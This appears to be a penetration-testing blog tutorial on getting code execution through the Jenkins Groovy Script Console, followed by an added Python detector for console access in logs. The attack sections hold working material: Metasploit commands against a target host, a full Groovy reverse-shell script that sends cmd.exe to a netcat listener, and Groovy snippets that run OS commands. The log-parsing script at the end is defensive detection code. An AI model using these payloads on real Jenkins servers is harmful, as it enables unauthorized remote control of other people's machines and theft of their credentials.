Hello Friends!! There are many ways to exploit Jenkins, but here we are interested in the Script Console, because Jenkins has a lovely Groovy script console that permits anyone with access to it to run arbitrary Groovy scripts inside the Jenkins master runtime.
Table of Contents
§ Jenkins' Groovy Script Console
§ Metasploit
§ revsh.groovy
§ Groovy executing shell commands - I
§ Groovy executing shell commands - II
Jenkins' Groovy Script Console
Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful language which offers the ability to do practically anything Java can do, including:
§ Create sub-processes and execute arbitrary commands on the Jenkins master and agents.
§ Read any file on the host that the Jenkins master has access to (such as /etc/passwd).
§ Decrypt credentials configured within Jenkins.
Granting a normal Jenkins user Script Console access is therefore essentially the same as giving them Administrator rights within Jenkins.
Metasploit
This module uses the Jenkins-CI Groovy script console to execute OS commands using Java.
use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost 192.168.1.106
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit
Metasploit uses a command stager to deliver its payload through this command-injection vector. As you can observe, the module returned a Meterpreter session on the victim's machine.
revsh.groovy
If you find a Jenkins instance without a login password, or you are a normal user who has permission to access the script console, you can exploit this privilege to get a reverse shell on the machine. On the Jenkins dashboard go to Manage Jenkins and then select Script Console.
In the script console you have full privilege to run any program code, so I tried to execute the following piece of code, which I took from GitHub, to get a reverse connection to my local machine via a netcat listener.
String host = "localhost";   // address the shell connects back to
int port = 8044;             // port the listener is waiting on
String cmd = "cmd.exe";      // interactive shell to spawn (Windows target)
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    // pump the shell's stdout/stderr to the socket and the socket's input to the shell's stdin
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}   // leave the loop once the shell has exited
}
p.destroy(); s.close();
nc -lvp 1234
Once the above script is executed, the netcat listener receives a shell session from the victim's machine.
Groovy executing shell commands - I
Similarly, with the help of the following piece of code, which I found here, I tried to achieve RCE by executing an OS command through the Groovy script console.
def sout = new StringBuffer(), serr = new StringBuffer()   // buffers for stdout and stderr
def proc = 'ipconfig'.execute()                              // spawn the OS command
proc.consumeProcessOutput(sout, serr)                        // collect its output asynchronously
proc.waitForOrKill(1000)                                     // wait up to 1 s, then kill it
println "out> $sout err> $serr"
Groovy executing shell commands - II
Similarly, I found another very small piece of code, from here, to exploit the Groovy console; it achieves RCE and executes a shell command.
def cmd = "cmd.exe /c dir".execute();   // run the command through cmd.exe
println("${cmd.text}");                  // print everything it wrote to stdout
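All of the approaches on this page, the Metasploit module and the three hand-written scripts alike, go through the script console, which Jenkins serves at /script, /scriptText and per agent under /computer/<name>/script, so those paths are a compact detection signal. The following Python script is an added example, not code from the original post: it parses constructed Jenkins access-log lines (assumed to be in NCSA combined format; the IPs and agent name are made up) and reports who viewed, executed or was denied on a script console endpoint.

```python
import re
from collections import Counter

# Constructed sample access-log lines (assumption: the Jenkins access log is
# written in NCSA combined format); hosts and paths are made up for the demo.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2024:10:01:09 +0000] "GET /script HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Mar/2024:10:01:15 +0000] "POST /script HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2024:10:02:30 +0000] "POST /scriptText HTTP/1.1" 200 64 "-" "python-requests/2.31"
10.0.0.7 - - [10/Mar/2024:10:02:31 +0000] "POST /computer/agent-1/script HTTP/1.1" 200 9001 "-" "python-requests/2.31"
192.168.1.9 - - [10/Mar/2024:10:03:00 +0000] "POST /script HTTP/1.1" 403 1200 "-" "curl/8.0"
192.168.1.60 - - [10/Mar/2024:10:04:00 +0000] "GET /job/build/1/console HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# Leading fields of an NCSA record; everything after the status code is ignored.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# Console endpoints Jenkins exposes: the web form (/script), the plain-text variant
# that scripted clients use (/scriptText) and the per-agent console under /computer/.
CONSOLE_RE = re.compile(r'^/(?:scriptText|script|computer/[^/]+/script(?:Text)?)(?:[?;]|$)')

def classify(method, status):
    """Only a POST runs Groovy; a GET merely renders the console form."""
    if method != "POST":
        return "viewed"
    if 200 <= status < 300:
        return "executed"
    return "denied" if status in (401, 403) else "attempted"

def script_console_events(log_text):
    """One finding per request that touched a script console endpoint."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not CONSOLE_RE.match(m["path"]):
            continue  # malformed record or an unrelated endpoint such as a build console
        events.append({"ip": m["ip"], "user": m["user"], "ts": m["ts"], "path": m["path"],
                       "verdict": classify(m["method"], int(m["status"]))})
    return events

def summarize(events):
    """Verdict counts per source IP: the figures a SOC rule would threshold on."""
    return Counter((e["ip"], e["verdict"]) for e in events)

if __name__ == "__main__":
    found = script_console_events(SAMPLE_LOG)
    for e in found:
        print(f'{e["ts"]}  {e["ip"]:<13} {e["verdict"]:<9} {e["path"]}')
    print(dict(summarize(found)))
```

The authenticated-user field is usually "-" in this log format, so correlate the source IP and timestamp with Jenkins' own login records to attribute an "executed" verdict to an account.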